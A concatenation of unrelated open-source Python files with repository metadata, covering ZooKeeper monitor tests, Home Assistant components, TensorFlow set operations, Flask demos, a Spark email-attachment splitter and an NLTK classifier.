self.assertEqual(resolver.call_count, 1)
iostream_obj.connect.assert_called_once_with(some_ip)
iostream_obj.write.assert_called_once()
args, kwargs = iostream_obj.write.call_args
self.assertEqual((b'sample_command\n',), args)
iostream_obj.write.reset_mock()
yield host.execute(' B__sample_command \n')
iostream_obj.write.assert_called_once()
args, kwargs = iostream_obj.write.call_args
self.assertEqual((b'B__sample_command\n',), args)
def test_set_timeout(self):
host = zk.Host('localhost', 2181)
host.set_timeout(100)
self.assertEqual(host.timeout, 100)
host.set_timeout(0.01)
self.assertEqual(host.timeout, 0.01)
self.assertRaises(zk.HostSetTimeoutValueError, partial(host.set_timeout, -1))
self.assertRaises(zk.HostSetTimeoutTypeError, partial(host.set_timeout, 'string'))
def test_str(self):
host = zk.Host('dummy.host.domain', 1133)
self.assertEqual(str(host), 'dummy.host.domain:1133')
def test_repr(self):
host = zk.Host('dummy.host.domain', 1133)
self.assertIn('dummy.host.domain:1133', repr(host))
@gen_test
def test_get_info(self):
host = zk.Host('localhost', 2181)
host.srvr = MagicMock(return_value=gen.maybe_future('Some result'))
res = yield host.get_info()
host.srvr.assert_called_once()
self.assertIsInstance(res, dict)
@gen_test
def test_resolve(self):
ph_io_loop = 'ioloop placeholder'
resolver_obj = Mock()
resolver_obj.resolve = MagicMock(return_value=gen.maybe_future(('a', 'b', 'c')))
resolver = MagicMock(return_value=resolver_obj)
patch('zookeeper_monitor.zk.host.Resolver', resolver).start()
host = zk.Host('localhost', 2181)
res = yield host._resolve(ph_io_loop)
resolver.assert_called_once_with(io_loop=ph_io_loop)
resolver_obj.assert_called_once()
self.assertEqual(res, 'a')
@gen_test
def test_srvr_ok(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.result_of_execute_srvr_ok.encode('utf-8')
))
ret = yield host.srvr()
host.execute.assert_called_once_with('srvr')
self.assertEqual(host.health, zk.Host.HOST_HEALTHY)
self.assertIsInstance(ret, dict)
@gen_test
def test_srvr_err(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.result_of_execute_srvr_err.encode('utf-8')
))
ret = yield host.srvr()
host.execute.assert_called_once()
self.assertEqual(host.health, zk.Host.HOST_ERROR)
self.assertFalse(ret)
host = zk.Host('localhost', 2181)
host.execute = MagicMock(side_effect=Exception)
ret = yield host.srvr()
self.assertFalse(ret)
self.assertEqual(host.health, zk.Host.HOST_ERROR)
@gen_test
def test_srvr_timeout(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(side_effect=zk.host.HostConnectionTimeout)
ret = yield host.srvr()
self.assertFalse(ret)
self.assertEqual(host.health, zk.Host.HOST_TIMEOUT)
@gen_test
def test_envi(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.envi['in'].encode('utf-8')
))
ret = yield host.envi()
host.execute.assert_called_once_with('envi')
self.assertEqual(ret, FIXTURE.envi['out'])
@gen_test
def test_dump_kill_srst_ruok_reqs(self):
for cmd in ['dump', 'kill', 'ruok', 'srst', 'reqs']:
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.simple['in'].encode('utf-8')
))
method = getattr(host, cmd)
ret = yield method()
host.execute.assert_called_once_with(cmd)
host.execute.reset_mock()
self.assertEqual(ret, FIXTURE.simple['out'])
|
{
"content_hash": "eb4db16d284d8716f9f4b95399620c8c",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 110,
"avg_line_length": 39.48880597014925,
"alnum_prop": 0.6078616649343287,
"repo_name": "kwarunek/zookeeper_monitor",
"id": "8727c499730eeca32f3badc16a2b33991884bce0",
"size": "10606",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_host.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "5607"
},
{
"name": "Python",
"bytes": "42000"
}
],
"symlink_target": ""
}
|
import cv2
import os
import numpy as np
from copy import copy
clicks = []
click_counter = 0
def _click_callback(event, x, y, flags, param):
global click_counter
global clicks
if event == cv2.EVENT_LBUTTONDOWN:
clicks.append((x, y))
click_counter -= 1
def click_on_image(
image, times=1, mark=False, delay=100,
text='Click on image', counter=True):
'''
Prompt the user with a window where he/she can click predetermined
times to complete action.
@params:
- image: np.array, image to show the user
- times: integer, number of clicks requested from the user
- mark: boolean, leave a mark on the image where clicked
- delay: integer, refresh rate - how many milliseconds image is shown
before refresh
- text: string, text to show on the window
'''
img = image.copy()
if len(img.shape) == 2:
img = np.stack([img] * 3, -1)
scale = get_scale(img)
global clicks
global click_counter
clicks = []
click_counter = times
while click_counter > 0:
if mark is not None and len(clicks) > 0:
cv2.circle(
img,
(int(clicks[-1][0] / scale), int(clicks[-1][1] / scale)),
int(img.shape[0] / 100.0), (255, 255, 255), 3)
cv2.circle(
img,
(int(clicks[-1][0] / scale), int(clicks[-1][1] / scale)),
int(img.shape[0] / 100.0), (0, 0, 0), -1)
if counter:
t = '(%s/%s) - %s' % (times - click_counter, times, text)
else:
t = text
cv2.namedWindow(t)
cv2.setMouseCallback(t, _click_callback)
k = show_image(img, text=t, destroy=False, time=delay)
if k != -1:
cv2.destroyAllWindows()
return k
cv2.destroyAllWindows()
out_clicks = copy(clicks)
clicks = []
out_clicks = np.asarray(np.array(out_clicks) / scale, dtype=int)
return out_clicks
def get_scale(image, max_dimensions=(750, 1200)):
'''
Given an image and maximum display dimensions,
get_scale returns a scale factor corresponding to the
optimal image size reduction to fit to the screen.
'''
dims = image.shape
if 0 in dims:
raise TypeError('Cannot show image without dimensions')
scale = min([
float(max_dimensions[0]) / dims[0],
float(max_dimensions[1]) / dims[1]])
return scale
def show_image(image, text='Image', time=0, destroy=True):
if os.uname()[-1] == 'armv7l':
return
scale = get_scale(image)
resized_image = image.copy()
resized_image = cv2.resize(resized_image, None, fx=scale, fy=scale)
cv2.imshow(str(text), resized_image)
k = cv2.waitKey(time)
if destroy:
cv2.destroyAllWindows()
return k
|
{
"content_hash": "f0020ec57067cd8b7cfad59f0850d32d",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 73,
"avg_line_length": 30.0531914893617,
"alnum_prop": 0.5830088495575221,
"repo_name": "Wing0/oskui",
"id": "1eab7dd7f4dfa1917844da9f577e3d7b575c10bc",
"size": "2825",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oskui/visual.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9557"
}
],
"symlink_target": ""
}
|
"""Media Source models."""
from __future__ import annotations
from abc import ABC
from dataclasses import dataclass
from homeassistant.components.media_player import BrowseMedia
from homeassistant.components.media_player.const import (
MEDIA_CLASS_CHANNEL,
MEDIA_CLASS_DIRECTORY,
MEDIA_TYPE_CHANNEL,
MEDIA_TYPE_CHANNELS,
)
from homeassistant.core import HomeAssistant, callback
from .const import DOMAIN, URI_SCHEME, URI_SCHEME_REGEX
@dataclass
class PlayMedia:
"""Represents a playable media."""
url: str
mime_type: str
class BrowseMediaSource(BrowseMedia):
"""Represent a browsable media file."""
children: list[BrowseMediaSource] | None
def __init__(self, *, domain: str | None, identifier: str | None, **kwargs):
"""Initialize media source browse media."""
media_content_id = f"{URI_SCHEME}{domain or ''}"
if identifier:
media_content_id += f"/{identifier}"
super().__init__(media_content_id=media_content_id, **kwargs)
self.domain = domain
self.identifier = identifier
@dataclass
class MediaSourceItem:
"""A parsed media item."""
hass: HomeAssistant
domain: str | None
identifier: str
async def async_browse(self) -> BrowseMediaSource:
"""Browse this item."""
if self.domain is None:
base = BrowseMediaSource(
domain=None,
identifier=None,
media_class=MEDIA_CLASS_DIRECTORY,
media_content_type=MEDIA_TYPE_CHANNELS,
title="Media Sources",
can_play=False,
can_expand=True,
children_media_class=MEDIA_CLASS_CHANNEL,
)
base.children = [
BrowseMediaSource(
domain=source.domain,
identifier=None,
media_class=MEDIA_CLASS_CHANNEL,
media_content_type=MEDIA_TYPE_CHANNEL,
title=source.name,
can_play=False,
can_expand=True,
)
for source in self.hass.data[DOMAIN].values()
]
return base
return await self.async_media_source().async_browse_media(self)
async def async_resolve(self) -> PlayMedia:
"""Resolve to playable item."""
return await self.async_media_source().async_resolve_media(self)
@callback
def async_media_source(self) -> MediaSource:
"""Return media source that owns this item."""
return self.hass.data[DOMAIN][self.domain]
@classmethod
def from_uri(cls, hass: HomeAssistant, uri: str) -> MediaSourceItem:
"""Create an item from a uri."""
match = URI_SCHEME_REGEX.match(uri)
if not match:
raise ValueError("Invalid media source URI")
domain = match.group("domain")
identifier = match.group("identifier")
return cls(hass, domain, identifier)
class MediaSource(ABC):
"""Represents a source of media files."""
name: str = None
def __init__(self, domain: str):
"""Initialize a media source."""
self.domain = domain
if not self.name:
self.name = domain
async def async_resolve_media(self, item: MediaSourceItem) -> PlayMedia:
"""Resolve a media item to a playable item."""
raise NotImplementedError
async def async_browse_media(
self, item: MediaSourceItem, media_types: tuple[str]
) -> BrowseMediaSource:
"""Browse media."""
raise NotImplementedError
|
{
"content_hash": "38b4be2d36e2d1d07ef99dfc46e1e72b",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 80,
"avg_line_length": 29.398373983739837,
"alnum_prop": 0.5998340707964602,
"repo_name": "adrienbrault/home-assistant",
"id": "aa17fff320efe1f1e7cd1147f3808e9256fb417f",
"size": "3616",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/media_source/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "32021043"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
}
|
class LadLoggingConfigException(Exception):
"""
Custom exception class for LAD logging (syslog & filelogs) config errors
"""
pass
class LadPerfCfgConfigException(Exception):
"""
Custom exception class for LAD perfCfg (raw OMI queries) config errors
"""
pass
|
{
"content_hash": "294e1284ebd8e9760a8f4431d7314313",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 76,
"avg_line_length": 24.333333333333332,
"alnum_prop": 0.6952054794520548,
"repo_name": "Azure/azure-linux-extensions",
"id": "7d84b3c1edcb10e3ddcd3e67b119a74102632e95",
"size": "1462",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "Diagnostic/Utils/lad_exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "81542"
},
{
"name": "C++",
"bytes": "1038973"
},
{
"name": "CMake",
"bytes": "11642"
},
{
"name": "Dockerfile",
"bytes": "1539"
},
{
"name": "Go",
"bytes": "136483"
},
{
"name": "HTML",
"bytes": "32736"
},
{
"name": "JavaScript",
"bytes": "22883"
},
{
"name": "Makefile",
"bytes": "11405"
},
{
"name": "PowerShell",
"bytes": "22400"
},
{
"name": "Python",
"bytes": "5124041"
},
{
"name": "Roff",
"bytes": "3827"
},
{
"name": "Shell",
"bytes": "66718"
}
],
"symlink_target": ""
}
|
"""Python layer for set_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework.python.framework import tensor_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import load_library
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import resource_loader
_set_ops = load_library.load_op_library(
resource_loader.get_path_to_datafile("_set_ops.so"))
assert _set_ops, "Could not load _set_ops.so."
_VALID_DTYPES = set([
dtypes.int8, dtypes.int16, dtypes.int32, dtypes.int64,
dtypes.uint8, dtypes.uint16, dtypes.string])
def _size_shape(unused_op):
"""Shape function for SetSize op."""
return [tensor_shape.unknown_shape()]
def set_size(a, validate_indices=True):
"""Compute number of unique elements along last dimension of `a`.
Args:
a: `SparseTensor`, with indices sorted in row-major order.
validate_indices: Whether to validate the order and range of sparse indices
in `a`.
Returns:
For `a` ranked `n`, this is a `Tensor` with rank `n-1`, and the same 1st
`n-1` dimensions as `a`. Each value is the number of unique elements in
the corresponding `[0...n-1]` dimension of `a`.
Raises:
TypeError: If `a` is an invalid types.
"""
a = tensor_util.convert_to_tensor_or_sparse_tensor(a, name="a")
if not isinstance(a, ops.SparseTensor):
raise TypeError("Expected `SparseTensor`, got %s." % a)
if a.values.dtype.base_dtype not in _VALID_DTYPES:
raise TypeError("Invalid dtype %s." % a.values.dtype)
# pylint: disable=protected-access
return _set_ops.set_size(a.indices, a.values, a.shape, validate_indices)
# TODO(ptucker): ops vs @ops?
ops.NoGradient("SetSize")
ops.RegisterShape("SetSize")(_size_shape)
def _sparse_shape(op):
"""Shape function for `SparseTensor` result."""
num_rows = (op.inputs[0].get_shape()[0] if
op.type in ("DenseToSparseOperation", "DenseToDenseOperation")
else None)
return [
tensor_shape.TensorShape([num_rows, 2]),
tensor_shape.unknown_shape(1),
tensor_shape.unknown_shape(1),
]
def _set_operation(a, b, set_operation, validate_indices=True):
"""Compute set operation of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
set_operation: String indicating set operaiton. See
SetOperationOp::SetOperationFromContext for valid values.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the results
of the set operation.
Raises:
TypeError: If inputs are invalid types.
ValueError: If `a` is sparse and `b` is dense.
"""
a = tensor_util.convert_to_tensor_or_sparse_tensor(a, name="a")
if a.dtype.base_dtype not in _VALID_DTYPES:
raise TypeError("'a' invalid dtype %s." % a.dtype)
b = tensor_util.convert_to_tensor_or_sparse_tensor(b, name="b")
if b.dtype.base_dtype != a.dtype.base_dtype:
raise TypeError("Types don't match, %s vs %s." % (a.dtype, b.dtype))
# pylint: disable=protected-access
if isinstance(a, ops.SparseTensor):
if isinstance(b, ops.SparseTensor):
indices, values, shape = _set_ops.sparse_to_sparse_set_operation(
a.indices, a.values, a.shape, b.indices, b.values, b.shape,
set_operation, validate_indices)
else:
raise ValueError("Sparse,Dense is not supported, but Dense,Sparse is. "
"Please flip the order of your inputs.")
elif isinstance(b, ops.SparseTensor):
indices, values, shape = _set_ops.dense_to_sparse_set_operation(
a, b.indices, b.values, b.shape, set_operation, validate_indices)
else:
indices, values, shape = _set_ops.dense_to_dense_set_operation(
a, b, set_operation, validate_indices)
# pylint: enable=protected-access
return ops.SparseTensor(indices, values, shape)
def set_intersection(a, b, validate_indices=True):
"""Compute set intersection of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the
intersections.
"""
return _set_operation(a, b, "intersection", validate_indices)
ops.NoGradient("SetIntersection")
ops.RegisterShape("SetIntersection")(_sparse_shape)
def set_difference(a, b, aminusb=True, validate_indices=True):
"""Compute set difference of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
aminusb: Whether to subtract `b` from `a`, vs vice versa.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the
differences.
"""
return _set_operation(a, b, "a-b" if aminusb else "b-a", validate_indices)
ops.NoGradient("SetDifference")
ops.RegisterShape("SetDifference")(_sparse_shape)
def set_union(a, b, validate_indices=True):
"""Compute set union of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the
unions.
"""
return _set_operation(a, b, "union", validate_indices)
ops.NoGradient("SetUnion")
ops.RegisterShape("SetUnion")(_sparse_shape)
|
{
"content_hash": "6ec3f974b24c971e2029fadd6364359d",
"timestamp": "",
"source": "github",
"line_count": 197,
"max_line_length": 79,
"avg_line_length": 37.16751269035533,
"alnum_prop": 0.6857416006555586,
"repo_name": "Lab603/PicEncyclopedias",
"id": "4ed4370d92ceda53e081016164ef36a202feb75e",
"size": "8011",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "jni-build/jni-build/jni/include/tensorflow/contrib/metrics/python/ops/set_ops.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "361482"
},
{
"name": "C++",
"bytes": "22994090"
},
{
"name": "CMake",
"bytes": "72924"
},
{
"name": "CSS",
"bytes": "1548"
},
{
"name": "HTML",
"bytes": "1040352"
},
{
"name": "Java",
"bytes": "252082"
},
{
"name": "JavaScript",
"bytes": "25902"
},
{
"name": "Jupyter Notebook",
"bytes": "3547008"
},
{
"name": "Makefile",
"bytes": "47206"
},
{
"name": "Objective-C",
"bytes": "10664"
},
{
"name": "Objective-C++",
"bytes": "91354"
},
{
"name": "Python",
"bytes": "19063444"
},
{
"name": "Shell",
"bytes": "476334"
},
{
"name": "TypeScript",
"bytes": "1264488"
}
],
"symlink_target": ""
}
|
import flask, flask.views
users = {'jake':'bacon'}
class Login(flask.views.MethodView):
def get(self):
return flask.render_template('login.html')
def post(self):
if 'logout' in flask.request.form:
flask.session.pop('username', None)
return flask.redirect(flask.url_for('login'))
required = ['username', 'passwd']
for r in required:
if r not in flask.request.form:
flask.flash("Error: {0} is required.".format(r))
return flask.redirect(flask.url_for('login'))
username = flask.request.form['username']
passwd = flask.request.form['passwd']
if username in users and users[username] == passwd:
flask.session['username'] = username
else:
flask.flash("Username doesn't exist or incorrect password")
return flask.redirect(flask.url_for('login'))
|
{
"content_hash": "bc5996dcfbe5f912e95cfedba85c6167",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 71,
"avg_line_length": 39.291666666666664,
"alnum_prop": 0.5832449628844114,
"repo_name": "sergeimoiseev/egrixcalc",
"id": "cdd2d7a7e8c4c47856f39211324f82327beb4f46",
"size": "943",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "part 5 - static pages/final/login.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "309"
},
{
"name": "CSS",
"bytes": "7337"
},
{
"name": "HTML",
"bytes": "76658"
},
{
"name": "Python",
"bytes": "89175"
},
{
"name": "Shell",
"bytes": "808"
}
],
"symlink_target": ""
}
|
from flask import Flask, request, send_from_directory
import os
port = int(os.getenv("PORT", 9099))
app = Flask(__name__)
@app.route("/<path:path>")
def serve_page(path):
return send_from_directory("static", path)
@app.route("/")
def main():
"""Adjust the presentation_name if you rename the jupyter notebook."""
presentation_name = "presentation_template.slides.html"
return app.send_static_file(presentation_name)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=port)
|
{
"content_hash": "a01b84d27126fb8dba16c1c5f7f73b3c",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 74,
"avg_line_length": 26.473684210526315,
"alnum_prop": 0.6719681908548708,
"repo_name": "mlmerile/presagir",
"id": "b0608d93ea7a7cde101ee9b8ab5c8fa310293af7",
"size": "503",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "static/run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "552332"
},
{
"name": "GLSL",
"bytes": "3308"
},
{
"name": "HTML",
"bytes": "683700"
},
{
"name": "JavaScript",
"bytes": "14670186"
},
{
"name": "Jupyter Notebook",
"bytes": "19879"
},
{
"name": "Python",
"bytes": "2246"
},
{
"name": "Shell",
"bytes": "189"
},
{
"name": "Smarty",
"bytes": "10152"
}
],
"symlink_target": ""
}
|
import json
import argparse
import datetime
import os
from filters import valid_json_filter
from functools import partial
from pyspark import SparkContext, SparkConf
def rmkey(k, o):
if k in o:
del o[k]
return o
def extractKeys(keys, o):
rtn = {}
for k in keys:
if k in o:
rtn[k] = o[k]
return rtn
def removeAttachments(x):
x['attachments'] = map(lambda o: rmkey('contents64', o), x['attachments'])
return x
def extractAttachments(x):
parent_fields = {
'id' : x['id'],
'datetime' : x['datetime'],
"ingest_id" : x["ingest_id"],
"case_id" : x["case_id"],
"alt_ref_id" : x["alt_ref_id"],
"label" : x["label"],
"original_artifact" : x["original_artifact"]
}
attachments = map(lambda o: extractKeys([
'guid',
'extension',
'filename',
'content',
'contents64',
'content_extracted',
'content_encrypted',
'content_length',
'content_type',
'content_hash',
'content_tika_langid',
'exif',
'image_analytics',
'metadata',
'size'
], o), x['attachments'])
attachments = [dict(a, **parent_fields) for a in attachments]
return attachments
def dump(x):
return json.dumps(x)
if __name__ == "__main__":
desc='newman split emails and attachment for indexing '
parser = argparse.ArgumentParser(
description=desc,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=desc)
parser.add_argument("input_emails_content_path", help="joined email extracted content and base64 attachment")
parser.add_argument("output_path_emails", help="output directory for spark results emails without base64 attachment")
parser.add_argument("output_path_raw_attachments", help="output directory for spark results attachments ")
parser.add_argument("-v", "--validate_json", action="store_true", help="Filter broken json. Test each json object and output broken objects to tmp/failed.")
args = parser.parse_args()
lex_date = datetime.datetime.utcnow().strftime('%Y%m%d%H%M%S')
print "INFO: Running with json filter {}.".format("enabled" if args.validate_json else "disabled")
filter_fn = partial(valid_json_filter, os.path.basename(__file__), lex_date, not args.validate_json)
conf = SparkConf().setAppName("Newman split attachments and emails")
sc = SparkContext(conf=conf)
rdd_emails = sc.textFile(args.input_emails_content_path).filter(filter_fn).map(lambda x: json.loads(x))
rdd_emails.map(removeAttachments).map(dump).saveAsTextFile(args.output_path_emails)
rdd_emails.flatMap(extractAttachments).map(dump).saveAsTextFile(args.output_path_raw_attachments)
|
{
"content_hash": "3bd1df51145ce8c51f45dae9529eb0e9",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 161,
"avg_line_length": 33.55421686746988,
"alnum_prop": 0.6434470377019749,
"repo_name": "Sotera/pst-extraction",
"id": "fe1814dc88069e65d37c870c638724429c4c553e",
"size": "2808",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spark/attachment_split.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "2178"
},
{
"name": "Java",
"bytes": "15069"
},
{
"name": "Python",
"bytes": "151392"
},
{
"name": "Scala",
"bytes": "7775"
},
{
"name": "Shell",
"bytes": "37462"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from Queue import *
|
{
"content_hash": "fd3a7a355720d9c819aef2b7fe935569",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 38,
"avg_line_length": 20,
"alnum_prop": 0.75,
"repo_name": "AbsoluteMSTR/pies",
"id": "8cd58f380da1b2154e25e8c3ba52947bac39a50e",
"size": "60",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "pies2overrides/queue.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31432"
},
{
"name": "Shell",
"bytes": "1169"
}
],
"symlink_target": ""
}
|
"""
Support for Eufy lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.eufy/
"""
import logging
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_HS_COLOR, SUPPORT_BRIGHTNESS,
SUPPORT_COLOR_TEMP, SUPPORT_COLOR, Light)
import homeassistant.util.color as color_util
from homeassistant.util.color import (
color_temperature_mired_to_kelvin as mired_to_kelvin,
color_temperature_kelvin_to_mired as kelvin_to_mired)
DEPENDENCIES = ['eufy']
_LOGGER = logging.getLogger(__name__)
EUFY_MAX_KELVIN = 6500
EUFY_MIN_KELVIN = 2700
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up Eufy bulbs."""
if discovery_info is None:
return
add_entities([EufyLight(discovery_info)], True)
class EufyLight(Light):
"""Representation of a Eufy light."""
def __init__(self, device):
"""Initialize the light."""
import lakeside
self._temp = None
self._brightness = None
self._hs = None
self._state = None
self._name = device['name']
self._address = device['address']
self._code = device['code']
self._type = device['type']
self._bulb = lakeside.bulb(self._address, self._code, self._type)
self._colormode = False
if self._type == "T1011":
self._features = SUPPORT_BRIGHTNESS
elif self._type == "T1012":
self._features = SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP
elif self._type == "T1013":
self._features = SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | \
SUPPORT_COLOR
self._bulb.connect()
def update(self):
"""Synchronise state from the bulb."""
self._bulb.update()
if self._bulb.power:
self._brightness = self._bulb.brightness
self._temp = self._bulb.temperature
if self._bulb.colors:
self._colormode = True
self._hs = color_util.color_RGB_to_hs(*self._bulb.colors)
else:
self._colormode = False
self._state = self._bulb.power
@property
def unique_id(self):
"""Return the ID of this light."""
return self._address
@property
def name(self):
"""Return the name of the device if any."""
return self._name
@property
def is_on(self):
"""Return true if device is on."""
return self._state
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return int(self._brightness * 255 / 100)
@property
def min_mireds(self):
"""Return minimum supported color temperature."""
return kelvin_to_mired(EUFY_MAX_KELVIN)
@property
def max_mireds(self):
"""Return maximu supported color temperature."""
return kelvin_to_mired(EUFY_MIN_KELVIN)
@property
def color_temp(self):
"""Return the color temperature of this light."""
temp_in_k = int(EUFY_MIN_KELVIN + (self._temp *
(EUFY_MAX_KELVIN - EUFY_MIN_KELVIN)
/ 100))
return kelvin_to_mired(temp_in_k)
@property
def hs_color(self):
"""Return the color of this light."""
if not self._colormode:
return None
return self._hs
@property
def supported_features(self):
"""Flag supported features."""
return self._features
def turn_on(self, **kwargs):
"""Turn the specified light on."""
brightness = kwargs.get(ATTR_BRIGHTNESS)
colortemp = kwargs.get(ATTR_COLOR_TEMP)
# pylint: disable=invalid-name
hs = kwargs.get(ATTR_HS_COLOR)
if brightness is not None:
brightness = int(brightness * 100 / 255)
else:
if self._brightness is None:
self._brightness = 100
brightness = self._brightness
if colortemp is not None:
self._colormode = False
temp_in_k = mired_to_kelvin(colortemp)
relative_temp = temp_in_k - EUFY_MIN_KELVIN
temp = int(relative_temp * 100 /
(EUFY_MAX_KELVIN - EUFY_MIN_KELVIN))
else:
temp = None
if hs is not None:
rgb = color_util.color_hsv_to_RGB(
hs[0], hs[1], brightness / 255 * 100)
self._colormode = True
elif self._colormode:
rgb = color_util.color_hsv_to_RGB(
self._hs[0], self._hs[1], brightness / 255 * 100)
else:
rgb = None
try:
self._bulb.set_state(power=True, brightness=brightness,
temperature=temp, colors=rgb)
except BrokenPipeError:
self._bulb.connect()
self._bulb.set_state(power=True, brightness=brightness,
temperature=temp, colors=rgb)
def turn_off(self, **kwargs):
"""Turn the specified light off."""
try:
self._bulb.set_state(power=False)
except BrokenPipeError:
self._bulb.connect()
self._bulb.set_state(power=False)
|
{
"content_hash": "2c8093cd87892aadbf9514a09b64759c",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 78,
"avg_line_length": 31.405882352941177,
"alnum_prop": 0.5663982019104701,
"repo_name": "PetePriority/home-assistant",
"id": "7a44a58cd81d09e9a444d43fd92526668b651a2c",
"size": "5339",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/eufy/light.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1073"
},
{
"name": "Python",
"bytes": "13985647"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17364"
}
],
"symlink_target": ""
}
|
from nltk.classify import PositiveNaiveBayesClassifier
from detie.data import PickleData, DictData
def features(words):
return {char: True for char in words}
def train(spam_words, unlabeled_words):
spams = list(map(features, spam_words))
unlabeled = list(map(features, unlabeled_words))
model = PositiveNaiveBayesClassifier.train(spams, unlabeled, 0.5)
data = PickleData('bayesmodel.pickle')
data.write(model)
return model
def predictor():
data = PickleData('bayesmodel.pickle')
if data.exists:
model = data.read()
else:
model = retrain()
def classify(word):
pb = model.prob_classify(features(word))
return pb.prob(1) > 0.95
return classify
def retrain():
spams = DictData('spams.txt', encoding='utf8')
unlabeled = DictData('unlabeled.txt', encoding='utf8')
return train(spams.texts, unlabeled.texts)
|
{
"content_hash": "82d7e77050e87577aa37a8864d893a46",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 69,
"avg_line_length": 25.8,
"alnum_prop": 0.6821705426356589,
"repo_name": "shanzi/detie",
"id": "63ad88665c17ff0a94bb8b83d5a8b3adc7f6c211",
"size": "903",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "detie/bayes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1372401"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import json
from django import forms
from django.core import mail
from django.core.urlresolvers import reverse
